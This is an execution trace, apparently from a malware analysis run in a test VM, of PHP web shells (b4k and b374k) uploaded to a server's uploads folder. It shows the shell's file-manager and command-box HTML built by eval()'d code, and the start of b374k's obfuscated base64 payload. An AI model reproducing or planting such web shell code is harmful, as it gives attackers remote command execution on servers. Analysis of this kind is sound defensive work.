3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 19:19</td><td><span id="titik2"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik2\',\'titik2_form\');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" v'
4 88 0 0.013662 702528 fileowner 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
4 88 1 0.013678 702560
4 88 R 0
4 89 0 0.013691 702520 posix_getpwuid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 89 1 0.013716 703320
4 89 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 90 0 0.013760 702520 filegroup 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
4 90 1 0.013774 702560
4 90 R 0
4 91 0 0.013787 702520 posix_getgrgid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 91 1 0.013810 703176
4 91 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 92 0 0.013862 702520 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
5 93 0 0.013878 702520 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'data'
5 93 1 0.013894 702616
5 93 R 'data'
4 92 1 0.013908 702520
4 92 R 'data'
4 94 0 0.013923 702712 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
5 95 0 0.013935 702712 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'data'
5 95 1 0.013950 702808
5 95 R 'data'
4 94 1 0.013968 702712
4 94 R 'data'
4 96 0 0.013982 703160 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
5 97 0 0.013995 703160 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'data'
5 97 1 0.014009 703256
5 97 R 'data'
4 96 1 0.014022 703160
4 96 R 'data'
4 98 0 0.014035 703160 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
5 99 0 0.014048 703160 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'data'
5 99 1 0.014062 703256
5 99 R 'data'
4 98 1 0.014075 703160
4 98 R 'data'
4 100 0 0.014088 703344 get_perms 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 101 0 0.014103 703344 fileperms 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 101 1 0.014119 703408
5 101 R 16895
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 100 1 0.014248 703408
4 100 R 'rwxrwxrwx'
4 102 0 0.014263 703312 filemtime 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
4 102 1 0.014278 703328
4 102 R 1676247557
4 103 0 0.014292 703288 date 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 'd-M-Y H:i' 1676247557
4 103 1 0.014324 703616
4 103 R '12-Feb-2023 19:19'
4 104 0 0.014339 703288 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
5 105 0 0.014352 703288 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'data'
5 105 1 0.014367 703384
5 105 R 'data'
4 104 1 0.014380 703288
4 104 R 'data'
4 106 0 0.014393 703416 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'data'
5 107 0 0.014406 703416 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'data'
5 107 1 0.014421 703512
5 107 R 'data'
4 106 1 0.014434 703416
4 106 R 'data'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= '<tr><td><a id="data_link" href="?y=/var/www/html/uploads/data/">[ data ]</a> <form action="?y=/var/www/html/uploads/" method="post" id="data_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="data" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="data" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $full = '/var/www/html/uploads/.htaccess'
4 108 0 0.014489 704112 fileowner 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
4 108 1 0.014505 704160
4 108 R 0
4 109 0 0.014518 704120 posix_getpwuid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 109 1 0.014543 704920
4 109 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 110 0 0.014586 704120 filegroup 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
4 110 1 0.014600 704160
4 110 R 0
4 111 0 0.014613 704120 posix_getgrgid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 111 1 0.014642 704776
4 111 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 112 0 0.014693 704120 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
5 113 0 0.014707 704120 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 113 1 0.014722 704216
5 113 R '.htaccess'
4 112 1 0.014736 704120
4 112 R '.htaccess'
4 114 0 0.014751 704344 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
5 115 0 0.014764 704344 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 115 1 0.014778 704440
5 115 R '.htaccess'
4 114 1 0.014792 704344
4 114 R '.htaccess'
4 116 0 0.014806 704760 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
5 117 0 0.014819 704760 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 117 1 0.014833 704856
5 117 R '.htaccess'
4 116 1 0.014847 704760
4 116 R '.htaccess'
4 118 0 0.014860 704760 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
5 119 0 0.014873 704760 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 119 1 0.014888 704856
5 119 R '.htaccess'
4 118 1 0.014901 704760
4 118 R '.htaccess'
4 120 0 0.014914 704888 ukuran 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 121 0 0.014928 704888 filesize 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 121 1 0.014945 704944
5 121 R 64
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $size = 64
4 120 1 0.014970 704904
4 120 R 64
4 122 0 0.014984 704904 get_perms 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 123 0 0.014998 704904 fileperms 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 123 1 0.015012 704944
5 123 R 33188
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mode = 33188
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 122 1 0.015135 704944
4 122 R 'rw-r--r--'
4 124 0 0.015149 705032 filemtime 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
4 124 1 0.015164 705072
4 124 R 1676247557
4 125 0 0.015177 705032 date 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 'd-M-Y H:i' 1676247557
4 125 1 0.015209 705360
4 125 R '12-Feb-2023 19:19'
4 126 0 0.015225 705160 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
5 127 0 0.015238 705160 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 127 1 0.015253 705256
5 127 R '.htaccess'
4 126 1 0.015271 705160
4 126 R '.htaccess'
4 128 0 0.015285 705160 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '.htaccess'
5 129 0 0.015298 705160 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 129 1 0.015312 705256
5 129 R '.htaccess'
4 128 1 0.015326 705160
4 128 R '.htaccess'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= '<tr><td><a id=".htaccess_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/.htaccess">.htaccess</a> <form action="?y=/var/www/html/uploads/" method="post" id=".htaccess_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value=".htaccess" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value=".htaccess" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" '
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $full = '/var/www/html/uploads/b4k.php.suspected'
4 130 0 0.015380 708240 fileowner 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
4 130 1 0.015396 708272
4 130 R 1000
4 131 0 0.015410 708232 posix_getpwuid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 1000
4 131 1 0.015465 709048
4 131 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $name = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4 132 0 0.015511 708248 filegroup 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
4 132 1 0.015525 708288
4 132 R 1000
4 133 0 0.015538 708248 posix_getgrgid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 1000
4 133 1 0.015571 708904
4 133 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $group = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $owner = 'osboxes<span class="gaya"> : </span>osboxes'
4 134 0 0.015622 708264 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
5 135 0 0.015636 708264 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'b4k.php.suspected'
5 135 1 0.015652 708360
5 135 R 'b4k.php.suspected'
4 134 1 0.015666 708264
4 134 R 'b4k.php.suspected'
4 136 0 0.015681 708520 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
5 137 0 0.015695 708520 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'b4k.php.suspected'
5 137 1 0.015710 708616
5 137 R 'b4k.php.suspected'
4 136 1 0.015725 708520
4 136 R 'b4k.php.suspected'
4 138 0 0.015739 709032 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
5 139 0 0.015753 709032 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'b4k.php.suspected'
5 139 1 0.015767 709128
5 139 R 'b4k.php.suspected'
4 138 1 0.015781 709032
4 138 R 'b4k.php.suspected'
4 140 0 0.015795 709032 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
5 141 0 0.015809 709032 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'b4k.php.suspected'
5 141 1 0.015823 709128
5 141 R 'b4k.php.suspected'
4 140 1 0.015837 709032
4 140 R 'b4k.php.suspected'
4 142 0 0.015851 709032 ukuran 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/b4k.php.suspected'
5 143 0 0.015874 709032 filesize 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/b4k.php.suspected'
5 143 1 0.015891 709088
5 143 R 14428
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $size = 14428
5 144 0 0.015918 709048 round 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 14.08984375 2
5 144 1 0.015933 709120
5 144 R 14.09
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $size = 14.09
4 142 1 0.015960 709088
4 142 R '14.09 kb'
4 145 0 0.015975 709176 get_perms 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/b4k.php.suspected'
5 146 0 0.015994 709176 fileperms 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/b4k.php.suspected'
5 146 1 0.016008 709216
5 146 R 33204
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mode = 33204
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 145 1 0.016135 709216
4 145 R 'rw-rw-r--'
4 147 0 0.016149 709176 filemtime 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/b4k.php.suspected'
4 147 1 0.016163 709216
4 147 R 1676247557
4 148 0 0.016176 709176 date 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 'd-M-Y H:i' 1676247557
4 148 1 0.016209 709504
4 148 R '12-Feb-2023 19:19'
4 149 0 0.016225 709304 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
5 150 0 0.016238 709304 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'b4k.php.suspected'
5 150 1 0.016253 709400
5 150 R 'b4k.php.suspected'
4 149 1 0.016268 709304
4 149 R 'b4k.php.suspected'
4 151 0 0.016283 709560 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'b4k.php.suspected'
5 152 0 0.016296 709560 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'b4k.php.suspected'
5 152 1 0.016311 709656
5 152 R 'b4k.php.suspected'
4 151 1 0.016325 709560
4 151 R 'b4k.php.suspected'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= '<tr><td><a id="b4k.php.suspected_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/b4k.php.suspected">b4k.php.suspected</a> <form action="?y=/var/www/html/uploads/" method="post" id="b4k.php.suspected_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="b4k.php.suspected" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="b4k.php.suspected" /> <input class="inputzbut" type="submit" name="ren'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $full = '/var/www/html/uploads/prepend.php'
4 153 0 0.016379 708280 fileowner 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
4 153 1 0.016395 708296
4 153 R 0
4 154 0 0.016409 708256 posix_getpwuid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 154 1 0.016433 709056
4 154 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 155 0 0.016476 708240 filegroup 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
4 155 1 0.016490 708280
4 155 R 0
4 156 0 0.016503 708240 posix_getgrgid 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 0
4 156 1 0.016525 708896
4 156 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 157 0 0.016576 708224 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
5 158 0 0.016590 708224 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 158 1 0.016605 708320
5 158 R 'prepend.php'
4 157 1 0.016620 708224
4 157 R 'prepend.php'
4 159 0 0.016639 708448 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
5 160 0 0.016653 708448 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 160 1 0.016668 708544
5 160 R 'prepend.php'
4 159 1 0.016682 708448
4 159 R 'prepend.php'
4 161 0 0.016695 708864 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
5 162 0 0.016709 708864 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 162 1 0.016723 708960
5 162 R 'prepend.php'
4 161 1 0.016737 708864
4 161 R 'prepend.php'
4 163 0 0.016750 708864 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
5 164 0 0.016764 708864 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 164 1 0.016779 708960
5 164 R 'prepend.php'
4 163 1 0.016792 708864
4 163 R 'prepend.php'
4 165 0 0.016805 708992 ukuran 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 166 0 0.016819 708992 filesize 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 166 1 0.016835 709056
5 166 R 57
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $size = 57
4 165 1 0.016860 709016
4 165 R 57
4 167 0 0.016874 709016 get_perms 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 168 0 0.016888 709016 fileperms 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 168 1 0.016903 709056
5 168 R 33261
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $mode = 33261
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $perms .= 'x'
4 167 1 0.017031 709056
4 167 R 'rwxr-xr-x'
4 169 0 0.017046 709144 filemtime 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
4 169 1 0.017060 709184
4 169 R 1676247557
4 170 0 0.017074 709144 date 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 2 'd-M-Y H:i' 1676247557
4 170 1 0.017106 709472
4 170 R '12-Feb-2023 19:19'
4 171 0 0.017122 709272 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
5 172 0 0.017135 709272 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 172 1 0.017151 709368
5 172 R 'prepend.php'
4 171 1 0.017165 709272
4 171 R 'prepend.php'
4 173 0 0.017197 709272 clearspace 1 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 1 'prepend.php'
5 174 0 0.017211 709272 str_replace 0 /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 174 1 0.017226 709368
5 174 R 'prepend.php'
4 173 1 0.017240 709272
4 173 R 'prepend.php'
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= '<tr><td><a id="prepend.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/prepend.php">prepend.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="prepend.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="prepend.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="prepend.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class='
3 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff .= '</table>'
3 45 1 0.017297 704896
3 45 R ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2 A /var/www/html/uploads/b4k.php.suspected(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2 8 1 0.017486 712688
1 3 1 0.017512 554464
0.017546 462760
TRACE END [2023-02-12 22:19:43.016121]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:36:22.436057]
1 0 1 0.000223 393512
1 3 0 0.000388 410960 {main} 1 /var/www/html/uploads/b374k.php 0 0
2 4 0 0.000406 410960 error_reporting 0 /var/www/html/uploads/b374k.php 3 1 0
2 4 1 0.000422 411000
2 4 R 0
2 5 0 0.000435 410960 set_time_limit 0 /var/www/html/uploads/b374k.php 4 1 0
2 5 1 0.000451 411024
2 5 R FALSE
1 A /var/www/html/uploads/b374k.php 7 $code = '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
